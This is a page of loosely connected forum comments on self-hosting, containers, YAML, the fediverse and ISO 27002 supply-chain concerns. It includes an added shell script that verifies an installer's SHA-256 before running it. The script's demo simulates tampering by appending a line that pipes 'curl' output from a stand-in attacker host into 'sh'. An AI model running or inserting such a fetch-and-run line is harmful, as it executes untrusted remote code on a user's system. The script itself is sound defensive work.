

Iso27002 and provenance validation goes brrrrr




You’re not alone.
The industry itself has become pointlessly layered like some origami hell. As a former OS security guy I can say it’s not in a good state with all the supply-chain risks.
At the same time, many ‘help’ articles are karma-farming ‘splogs’ of low quality and/or just slop, so they’re not really useful. When something’s missing, it feels to our imposter syndrome like it’s a skills issue.
Simplify your life. Ditch and avoid anything with containers or bizarre architectures that feels too intricate. Decide what you need and run those on really reliable options. Auto patching is your friend (but choose a distro and package format where it’s atomic and rolls back easily).
You don’t need to come home only to work. This is supposed to be FUN for some of us. Don’t chase the Joneses, but just do what you want.
Once you’ve simplified, get in the habit of going outside. You’ll feel a lot better about it.


Still crutching on containers?
Comically, the organization with the worst history for virtualization has now doubled down on SaaS. This is certainly going well.
desktop client app for Linux
An app THAT DOES WHAT? You may as well be asking for “a food I can eat bite by bite”.


Still crutching on containers?


Got a version without docker?


Container crutches. Ew.
Where’s the Bazel people at?
CI compatible with GitHub Actions
Ugh. More yaml?
It’s still yaml shit though.


Packer builds the terraformable/openTofuable templates to launch into the hypervisor where chef (eventually mgmtConfig) will manage them from there until they die.
All that is launched by git. Fire and forget. Updates are cronned.
There are no containers. Don’t got time to fuck about. If Systemd wasn’t an absolute embarrassment I’d not worry about updates even as much as I do, which isn’t much aside from the aforementioned cancer.
Like, what 8 letters are abbreviated between those two Ns? Are we supposed to know?


I see it’s running Ansible. That’s an obvious risk.


The writing in this article is absolutely terrible. It needs some serious clean-up so that the message isn’t impaired by the medium.


I go to pixelfed to post my art and view other peoples art. that’s it. I don’t go there to read posts or what’s going on in peoples lives.
Yes but being able to do that is a design goal of the fediverse
Is it? Because that seems really dumb.
Here’s a radical idea: sometimes, web services are built with features you don’t use. Sometimes you don’t even *value* those features. But, in cases where your preference isn’t in the majority, the decision to include those features won’t match your personal preference.
Sometimes, the ability to share and see content between different sites is even a core value.
Weird.
For more information, search “false consensus”.
You may want to learn how you can configure your own accounts on various services to manage what you see on each one. Because, to some extent, that’s a configuration option.


The installation workflow begs for supply-chain exploits. Given this and its oob install, it probably breaks ISO 27002 as well.
I’ll wait. NextCloud and OwnCloud both have 27002-compliant installs (the latter needs some review), so I need to stick with those.
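The provenance complaint above is about install flows that download and execute in one step. As an added example that is not from this thread or from any of the projects it mentions, here is the minimal split a practitioner would want: pin a digest out of band, verify the downloaded artifact against it, and only then execute. The installer file, the pinned digest and the tampered variant are all constructed inside the script so it runs offline; the file names are hypothetical.

```shell
#!/bin/sh
# Added example: refuse to run a downloaded installer unless its SHA-256
# matches a digest pinned ahead of time. Pin the digest from a source you
# trust independently of the download host (release notes, a signed
# manifest, or your own earlier verified copy). Names below are hypothetical.

# Print the SHA-256 of a file; sha256sum (GNU) or shasum (BSD/macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_artifact FILE EXPECTED_SHA256
# Succeeds only when FILE exists and its digest equals EXPECTED_SHA256 exactly.
verify_artifact() {
    file="$1"
    expected="$2"
    [ -f "$file" ] || { echo "missing artifact: $file" >&2; return 1; }
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file" >&2
        echo "  expected: $expected" >&2
        echo "  actual:   $actual" >&2
        return 1
    fi
}

# run_verified FILE EXPECTED_SHA256
# The curl-pipe-sh pattern collapses download and execution into one step;
# keeping them separate means a swapped artifact is rejected before it runs.
run_verified() {
    verify_artifact "$1" "$2" || return 1
    sh "$1"
}

# demo: constructed installer in a temp dir. Returns 0 when the good copy is
# accepted and the tampered copy is rejected, 1 otherwise.
demo() {
    dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho "installer ran"\n' > "$dir/install.sh"
    pinned=$(sha256_of "$dir/install.sh")   # stand-in for an out-of-band pin
    run_verified "$dir/install.sh" "$pinned" >/dev/null || { rm -rf "$dir"; return 1; }
    # Tamper with the artifact after the pin was taken (simulated supply-chain swap).
    printf 'curl -s http://attacker.invalid/x | sh\n' >> "$dir/install.sh"
    if run_verified "$dir/install.sh" "$pinned" 2>/dev/null; then
        rm -rf "$dir"
        return 1
    fi
    rm -rf "$dir"
    return 0
}
```

A digest pin only moves trust to wherever the pin came from; if the pin is fetched from the same host as the artifact, an attacker who controls that host controls both. Pair it with a signature check against a key you obtained separately when the project publishes one.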
Still container-dependent?
This. If I pay the cost in frustration and anguish and soul-searching and demanding justice from an uncaring god, I want something for it. I want documentation. I want my lessons learned from the post incident review. I want something I can hack into mgmtConfig to make sure nothing else will do that too.
Struggling for no payoff is the absolute worst thing.
0 is the goal. Well done!
Edit: Ha! Some masochist down-voted that.